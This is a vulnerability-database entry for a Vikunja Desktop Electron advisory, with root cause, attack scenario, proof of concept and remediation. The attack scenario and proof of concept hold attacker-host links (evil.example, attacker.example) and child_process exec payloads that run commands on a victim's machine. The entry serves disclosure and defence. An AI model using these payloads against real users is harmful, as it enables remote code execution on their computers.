Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
4DescriptionGitHub Advisory
Vikunja is an open-source self-hosted task management platform. Starting in version 0.21.0 and prior to version 2.2.0, the Vikunja Desktop Electron wrapper enables nodeIntegration in the main BrowserWindow and does not restrict same-window navigations. An attacker who can place a link in user-generated content (task descriptions, comments, project descriptions) can cause the BrowserWindow to navigate to an attacker-controlled origin, where JavaScript executes with full Node.js access, resulting in arbitrary code execution on the victim's machine. Version 2.2.0 patches the issue.
Root cause
Two misconfigurations combine to create this vulnerability:
nodeIntegration: trueis set inBrowserWindowweb preferences (desktop/main.js:14-16), giving any page loaded in the renderer full access to Node.js APIs (require,child_process,fs, etc.).- No
will-navigateorwill-redirecthandler is registered on thewebContents. The existingsetWindowOpenHandler(desktop/main.js:19-23) only interceptswindow.open()calls (new-window requests). It does not intercept same-window navigations triggered by:
<a href="https://...">links (withouttarget="_blank")window.locationassignments- HTTP redirects
<meta http-equiv="refresh">tags
Attack scenario
- The attacker is a normal user on the same Vikunja instance (e.g., a member of a shared project).
- The attacker creates or edits a project description or task description containing a standard HTML link, e.g.:
<a href="https://evil.example/exploit">Click here for the updated design spec</a> - The Vikunja frontend renders this link. DOMPurify sanitization correctly allows it -- it is a legitimate anchor tag, not a script injection. Render path example:
frontend/src/views/project/ProjectInfo.vueusesv-htmlwith DOMPurify-sanitized output. - The victim uses Vikunja Desktop and clicks the link.
- Because no
will-navigatehandler exists, the BrowserWindow navigates tohttps://evil.example/exploitin the same renderer process. - The attacker's page now executes in a context with
nodeIntegration: trueand runs:require('child_process').exec('id > /tmp/pwned'); - Arbitrary commands execute as the victim's OS user.
Impact
Full remote code execution on the victim's desktop. The attacker can read/write arbitrary files, execute arbitrary commands, install malware or backdoors, and exfiltrate credentials and sensitive data. No XSS vulnerability is required -- a normal, sanitizer-approved hyperlink is sufficient.
Proof of concept
- Set up a Vikunja instance with two users sharing a project.
- As the attacker user, edit a project description to include:
<a href="https://attacker.example/poc.html">Meeting notes</a> - Host poc.html with:
<script>require('child_process').exec('calc.exe')</script> - As the victim, open the project in Vikunja Desktop and click the link.
- calc.exe (or any other command) executes on the victim's machine.
Credits
This vulnerability was found using GitHub Security Lab Taskflows.
AnalysisAI
Vikunja Desktop (Electron wrapper) versions 0.21.0 through 2.1.x contain a critical remote code execution vulnerability caused by enabled Node.js integration combined with missing navigation controls. An attacker who is a legitimate user on a shared Vikunja instance can inject a malicious hyperlink into user-generated content (task descriptions, comments, project descriptions) that, when clicked by a victim using Vikunja Desktop, causes arbitrary code execution with the victim's OS user privileges. A proof-of-concept demonstrating command execution via a simple HTML link has been documented, and the vulnerability affects all Desktop users on affected versions.
Technical ContextAI
Vikunja is an open-source task management platform distributed via cpe:2.3:a:go-vikunja:vikunja with both server and Electron-based Desktop components. The vulnerability stems from two misconfigurations in the Electron main process (desktop/main.js): enablement of nodeIntegration: true in BrowserWindow web preferences grants full Node.js API access (require, child_process, fs) to any JavaScript executing in the renderer, and absence of a will-navigate or will-redirect event handler allows same-window navigations to attacker-controlled origins. The existing setWindowOpenHandler only intercepts window.open() calls (new-window requests), not standard anchor tag navigation, HTTP redirects, or meta refresh directives. This combination violates the principle of least privilege and represents a CWE-94 (Improper Control of Generation of Code) vulnerability where untrusted input (user-controlled links) can trigger execution of Node.js code in a privileged context.
RemediationAI
Immediately upgrade Vikunja Desktop to version 2.2.0 or later, which disables nodeIntegration and implements will-navigate event handlers to restrict same-window navigations. Users unable to upgrade immediately should avoid clicking links within task descriptions, comments, and project descriptions from untrusted sources, and should disable Desktop application use in favor of the web interface until patching is complete. Organization administrators should enforce automatic updates for Vikunja Desktop via endpoint management tools and audit user accounts for suspicious activity, as the vulnerability allows any authenticated user to trigger code execution. For long-term hardening, review Electron application security best practices in the official Electron documentation (https://www.electronjs.org/docs/tutorial/security) and consider network segmentation to limit the impact of a compromised endpoint.
FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote
Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t
Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete
Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner
Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi
Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin
The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic
Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read
Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio
Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat
The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se
Same weakness CWE-94 – Code Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-14911